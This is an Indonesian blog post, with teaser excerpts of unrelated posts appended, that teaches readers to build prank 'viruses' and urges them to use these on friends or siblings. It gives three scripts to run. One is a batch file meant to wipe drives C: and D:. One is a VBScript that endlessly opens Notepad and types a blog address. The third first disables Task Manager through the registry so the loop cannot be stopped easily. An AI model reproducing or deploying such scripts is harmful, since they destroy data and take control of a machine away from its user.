Skip to main content

Belajar | Cara Membuat Virus Mematikan


Belajar | Cara Membuat Virus Mematikan -  Muncul begitu saja ide iseng membuat judul yang bikin banyak pengguna komputer kesel. Meskipun ini virus begitu sederhana dan mudah menghentikannya, tapi bagi yang tidak tau cara menghentikan ini virus ya bikin jengkel juga. Ada perasaan bangga bisa bikin virus, meskipun virus gadungan alias kelas teri, cuman sadarlah bahwa diatas perasaan bangga itu berakibat penderitaan di lain pihak. Mungkin itu juga yang memotivasi para pembuat virus, salah satunya menguji kemampuan dalam hal pemrograman membuat virus, dan bangga virus buatannya telah membuat banyak orang frustasi. Kenapa tidak membuat program yang bermanfaat bagi banyak orang? ahh... itu mah pilihan, masalah isi moral otak perasaan masing-masing.

Sebelum melanjutkan saya sarankan anda tidak melanjutkan membaca isi artikel ini lebih jauh, jika anda tidak kuat iman untuk berbuat mengerjain teman-teman atau bikin kesal kakak ato adek di rumah. Peringatan saja, selanjutnya terserah anda, resiko dan akibat ditanggung masing-masing. Kalau ini hanya penasaran dan menambah pengetahuan ya silahkan.

Berikut cara mudah membuat virus ikuti langkah-langkahnya secara urut :


Cara 1 :
Virus yang akan kita buat kali ini adalah virus yang bisa dikatakan jauh lebih mematikan dari pada virus - virus lainnya. Mungkin cara ini cukup ekstrem untuk dipraktikan. Jadi, jangan sampai artikel ini disalah gunakan.

Langsung saja, buka notepad dan ketikkan script berikut ini :

@echo off
DEL C: -Y
DEL D: -Y 


Kemudian simpan, lalu ubah [Save as type] menjadi [All Files], dan pada kotak [File Name] beri nama virus ini dengan kata apa saja terserah Anda dan diakhiri dengan kata .bat, misal virus.bat , kemudian klik save.

Setelah file ini disimpan, JANGAN DIKLIK!!!

Virus ini adalah virus yang sangat mematikan, bila anda mengklik virus ini, maka seluruh data yang ada di hardisk anda akan hilang tanpa terkecuali. Sehingga, hal ini dapat menyebabkan komputer Anda akan mati total. Gimana mau coba sendiri atau njahilin teman..??? 



Cara 2 :
1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

WScript.Sleep 18000
WScript.Sleep 1000
do
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "u"
WScript.Sleep 500
WshShell.SendKeys "n"
WScript.Sleep 500
WshShell.SendKeys "j"
WScript.Sleep 500
WshShell.SendKeys "u"
WScript.Sleep 500
WshShell.SendKeys "n"
WScript.Sleep 500
WshShell.SendKeys "g"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "e"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "s"
WScript.Sleep 500
WshShell.SendKeys "."
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys "g"
WScript.Sleep 500
WshShell.SendKeys "s"
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys "."
WScript.Sleep 500
WshShell.SendKeys "c"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys "m"
WScript.Sleep 500
wscript.sleep 5000
loop

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal inivirus.vbs)

3. Mo mencoba virus buatan sendiri? tinggal klik aja deh 2x, dan nikmatilah hasilnya


Nah lhooo trus gimana cara menghentikannya?

Ok, ikutilah langkah-langkah selanjutnya guampang :

1. Buka Task Manager dengan cara tekan Ctrl + Alt + Delete yang ada di keyboard tentunya.

2. Masuk ke tab Processes

3. Cari dan klik program yang sedang berjalan dengan nama wscripts.exe

4. Matikan program tersebut cara menekan End Process

Selesai dah cara membuat virus gadungan.



Cara 3 : 
1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

WScript.Sleep 18000
WScript.Sleep 1000
do
Set klikbebas = WScript.CreateObject("WScript.Shell")
klikbebas.Run "notepad"
WScript.Sleep 100
klikbebas.AppActivate "Notepad"
WScript.Sleep 500
klikbebas.SendKeys "K"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "j"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys " "
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "e"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "a"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "p"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "c"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "m"
WScript.Sleep 500
wscript.sleep 5000
loop

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal inivirus.vbs)

3. Mo mencoba virus buatan sendiri? tinggal klik aja deh 2x, dan nikmatilah hasilnya.


Nah lhooo trus gimana cara menghentikannya? dengan Task Manager Ctrl + Alt + Delete sudah tidak bisa.

Ok, ikutilah langkah-langkah mengaktifkan kembali Task Manager :

1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal ini antivirus.vbs)

3. Jalankan file vbs yang sudah dibuat tersebut, coba buka Task Manager dengan cara tekan Ctrl + Alt + Delete yang ada di keyboard tentunya.


Selesai dah cara membuat virus gadungan kelas teri. Seperti itulah virus dan antivirus dibuat, tapi ini contoh yang sederhana, dan sudah bisa bikin jengkel bagi yang tidak tau solusinya.

Read more : berbagai sumber

Comments

Post a Comment

Blog ini nofollow, jadi berkomentarlah yang baik jangan mengandung unsur:
-SARA
-SPAM
-Komentar berkaitan dengan artikel dan atau materi yang telah disajikan.
Go Blogger Indonesia ... :D

Popular posts from this blog

Kisah Cinta LDR (Pacaran Jarak Jauh)

Love is in the chat messenger
Girl : Kamu lagi ngapain say ?
Boy : Biasa lagi ngerjain tugas kuliah. Kamu udah makan ?
Girl : Udah. Kamu belum tidur ? Kalau disini siang berarti disana tengah malem kan ?
Boy : Biasa lah say aku belum bisa tidur kalau tugas belum selesai. Deadlinenya besok soalnya. Haha. Lembur deh aku malem ini.
Girl : Brati chatting aku ngganggu ya ?
Boy : Nggak kok, aku lagi isitirahat. Udah mau selesai juga kok tugasnya. Paling sejam lagi juga kelar
Girl : Kamu kapan pulang ke Indonesia ?
Boy : Libur semester ini aku pulang dari China ke tanah air. Mungkin dua bulan lagi. Kamu kapan pulang dari Inggris ? Aku kangen banget loh.
Girl : Mungkin libur semester juga, tapi libur semesterku masih empat bulan lagi. Yah nggak bakal ketemu dong kita. Hiks
Boy : Udah-udah. Kan sekarang kita lagi ketemuan walaupun Cuma di dunia maya.
Girl : Iya untung deh ada internet, walaupun kita LDR tetep bisa melepas cinta. Nggak kerasa udah hampir 6 bulan kita LDR.
Boy : Iya, kangen ni…

Perintah-Perintah Dasar Linux Debian

A. Perintah-perintah dasar GNU/Linux
Perintah-perintah (command) dasar di GNU/Linux di jalankan di suatu terminal shell yang
biasa disebut terminal atau console. Terminal atau console ini dikenal dengan istilah
command line interface (CLI) yang bisa diaktifkan dengan cara klik menu Applications -
Accessories - Terminal. Selain itu bisa juga dengan bekerja diconsole murni dengan
menakan kombinasi tombol ctrl+alt+F1 dimana F1 bisa diganti sampai F6. Untuk kembali
ke mode Grafical User Interface (GUI) tekan ctrl+alt+F7.
Berikut ini hanya beberapa command yang umum terdapat di setiap distribusi GNU/Linux
khususnya distribusi Ubuntu.
1. login
Fungsi : Untuk masuk ke dalam jaringan .
Keterangan : Setiap pemakai sah dari sistem UNIX mempunyai identifikasi pemakai
sendiri (ID).
2. password
Fungsi : Memasukkan kata sandi setelah login.
Keterangan : Untuk pemakai yang baru didaftar oleh SUPER USER maka user tidak
perlu memasukkan kata sandi. Untuk menjaga kerahasiaan, pengetikan
tombol passwor…

Jenis Jenis Tower Jaringan Telekomunikasi Berdasarkan . . .

Tower Jaringan Telekomunikasi adalah menara yang terbuat dari rangkaian besi atau pipa baik segi empat atau segitiga, atau hanya berupa pipa panjang (tongkat) yang bertujuan untuk menempatkan antenna dan radio pemancar maupun sebagai penerima gelombang telekomunikasi dan informasi. Intinya Tower BTS berfungsi untuk menjembatani perangkat komunikasi pengguna dengan jaringan yang menuju jaringan lain.

Berdasarkan Lokasinya, tower jaringan telekomunikasi dibagi menjadi 2 jenis, yaitu :
1. Rooftop : Tower yang berdiri di atas sebuah gedung.
2. Greenfield : Tower yang berdiri langsung di atas tanah.

Berdasarkan bentuknya, tower jaringan telekomunikasi dibagi menjadi 3 jenis, yaitu :

1. Tower 4 Kaki ( Rectangular Tower )

Tower ini berbentuk segi empat dengan empat kaki. Tower dengan 4 kaki sangat jarang sekali dijumpai roboh. Tower jenis ini memiliki kekuatan tiang pancang serta sudah dipertimbangkan konstruksinya. Tower ini mampu menampung banyak antenna dan radio. Harga tipe ini sangat m…